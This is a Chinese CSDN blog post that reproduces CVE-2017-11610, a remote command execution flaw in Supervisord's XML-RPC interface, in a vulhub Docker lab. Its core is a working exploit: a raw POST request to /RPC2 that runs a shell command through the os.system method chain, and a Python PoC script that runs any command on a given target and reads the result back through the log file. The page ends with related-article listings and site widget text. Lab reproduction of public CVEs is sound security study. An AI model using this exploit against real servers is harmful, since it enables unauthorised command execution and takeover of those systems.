vulhub漏洞复现67_Supervisor

最新推荐文章于 2022-04-09 12:12:09 发布
最新推荐文章于 2022-04-09 12:12:09 发布
阅读量342 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122910398
版权

CVE-2017-11610_ Supervisord 远程命令执行漏洞

前言

Supervisor(http://supervisord.org/)是用Python开发的一个client/server服务,是Linux/Unix系统下的一个进程管理工具,不支持Windows系统。它可以很方便的监听、启动、停止、重启一个或多个进程。

参考链接:

- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

- https://blogs.securiteam.com/index.php/archives/3348

-https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b

漏洞环境

靶场:192.168.4.10_ubuntu

#docker-compose build

docker-compose up -d

环境启动后,访问`http://your-ip:9001`即可查看Supervisord的页面。

 

漏洞测试

直接执行任意命令:

```

POST /RPC2 HTTP/1.1

Host: localhost

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 213

<?xml version="1.0"?>

<methodCall>

<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>

<params>

<param>

<string>touch /tmp/success</string>

</param>

</params>

</methodCall>

```

 容器查看success创建成功

## 关于直接回显的POC

@Ricter 在微博上提出的一个思路,甚是有效,就是将命令执行的结果写入log文件中,再调用Supervisord自带的readLog方法读取log文件,将结果读出来。

写了个简单的POC: [poc.py](poc.py),直接贴出来吧:

```python

#!/usr/bin/env python3

import xmlrpc.client

import sys

target = sys.argv[1]

command = sys.argv[2]

with xmlrpc.client.ServerProxy(target) as proxy:

    old = getattr(proxy, 'supervisor.readLog')(0,0)

    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()

    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))

    result = getattr(proxy, 'supervisor.readLog')(0,0)

    print(result[len(old):])

```

使用Python3执行并获取结果:`./poc.py "http://your-ip:9001/RPC2" "command"`:

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Supervisord 远程命令执行漏洞(CVE-2017-11610)
weixin_51387754的博客
06-03 691
Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。
远程桌面漏洞poc_Supervisord 远程代码执行漏洞(CVE201711610)漏洞复现
weixin_39730263的博客
12-10 147
漏洞信息Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。Supervisord在配置了Web接口后,服务器会启动一个XMLRPC服务器,端口号为9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段...
supervisior 配置
u010533742的博客
06-16 858
supervisor(go)
搭建学习环境(十二)——vulhub 漏洞复现环境搭建
baynk的博客
04-25 999
0x00 环境说明 vulhub靶场通过Docker可以部署大量的漏洞的环境,省去了安全人员在复现漏洞时需要部署大量的底层的时间,使安全人员的更多精力都可以在研究漏洞上。 下载地址:https://github.com/vulhub/vulhub vulhub靶场这是第二次安装了,第一次安装是在几年前,在学习安全时由于一直在补基础,感觉vulhub不是很友好,就放弃使用,最近可能需要使用再来安装一次,这次记录一下过程。 0x01 安装过程 这里使用的操作系统是ubuntu 20.10,可以官网自行下载,也
Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞复现
OKAY_TC的博客
04-22 3892
复现视频链接:https://www.ichunqiu.com/course/58895 如下内容为复现及笔记 Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞复现 0x01 漏洞信息 Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进...
backoff_supervisor:退避主管
06-15
backoff_supervisor backoff_supervisor是一个simple_one_for_one主管,有以下区别: 最多 1 个孩子。 start_child/2在尝试启动第二个孩子时返回{error, {already_started, Pid}} 。 最大重启次数为0 。 如果一个...
prodefficiency_supervisor_b:prodefficiency_supervisor的第二版
05-21
prodefficiency_supervisor_b 生产效率主管移动应用程序(B版) 安装所有需要的软件包: Android SDK 科尔多瓦(通过NPM) 创建cordova项目: 克隆项目 $ git clone ...
memory_supervisor_C.rar_memory
09-19
在本文中,我们将深入探讨如何使用C++的MFC(Microsoft Foundation Classes)框架来创建一个内存监视器程序,这是基于给定的“memory_supervisor_C.rar_memory”压缩包中的资源。MFC是微软为Windows应用程序开发提供...
PyPI 官网下载 | trajectory_supervisor-0.26.tar.gz
01-17
《PyPI官网下载 | trajectory_supervisor-0.26.tar.gz》 在Python的世界里,PyPI(Python Package Index)是官方的软件仓库,它为全球的Python开发者提供了丰富的第三方库资源。PyPI上的每个软件包都代表着一个可...
thy_supervisor:实现一个基本的类似 OTP 的 Supervisor 的练习
06-02
在本实践项目"thy_supervisor"中,我们将学习如何模仿OTP的Supervisor行为来实现一个基本的监督树。 首先,我们需要理解Supervisor的基本概念。在Elixir中,Supervisor是GenServer行为的扩展,它不仅处理服务请求,...
(30)【RCE集合】RCE漏洞的原理、出现地方、相关命令、函数解析、利用详细的过程
04-09 2595
详细理解RCE漏洞
Supervisord远程命令执行漏洞分析(CVE-2017-11610)
zzkk_的博客
08-10 5568
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。 Supervisor介绍 Supervisor 是基于 Pyt
python supervisord 远程命令执行漏洞(CVE-2017-11610)
whatday的专栏
06-27 750
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第三方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client,Server以一个服务的形式,跑在系统后台,而Client是一个命令行工具,其实就是根据用户的要求,调用Server提供的A
CVE-2017-8464远程命令执行漏洞(震网漏洞复现
qq_39627497的博客
12-06 1485
1、 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 2、 ...
Supervisord远程命令执行漏洞(CVE-2017-11610)
谢公子的博客
09-20 2952
目录 Supervisor 漏洞复现 修复建议 Supervisor Supervisor是使用Python 开发的进程管理程序,一般使用命令行进行管理,当然也能通过web接口图形化管理服务。在配置了web接口后,服务器会启动一个XML RPC服务器,端口为9001,默认配置接口是不需要密码访问的,管理员也可设置为密码访问。利用本漏洞,在获取该接口的访问权限后,远程攻击者可发送一段精心构...
漏洞公告】CVE-2017-11610:Supervisord 远程命令执行漏洞
CS13522431352的博客
08-09 671
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。
for _ in tqdm(range(train_steps), desc='Supervised network training'): X_ = next(synth.get_batch_data(stock_data, n_windows=len(stock_data))) step_g_loss_s = synth.train_supervisor(X_, supervisor_opt) generator_opt = Adam(learning_rate=learning_rate) embedder_opt = Adam(learning_rate=learning_rate) discriminator_opt = Adam(learning_rate=learning_rate) step_g_loss_u = step_g_loss_s = step_g_loss_v = step_e_loss_t0 = step_d_loss = 0
最新发布
07-12
2. 调用`synth.train_supervisor(X_, supervisor_opt)`方法,使用获取的批量数据来训练监督器网络。这个方法可能在之前的代码中定义了,用于执行一次监督器网络的训练,并返回相应的损失值(`step_g_loss_s`)。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值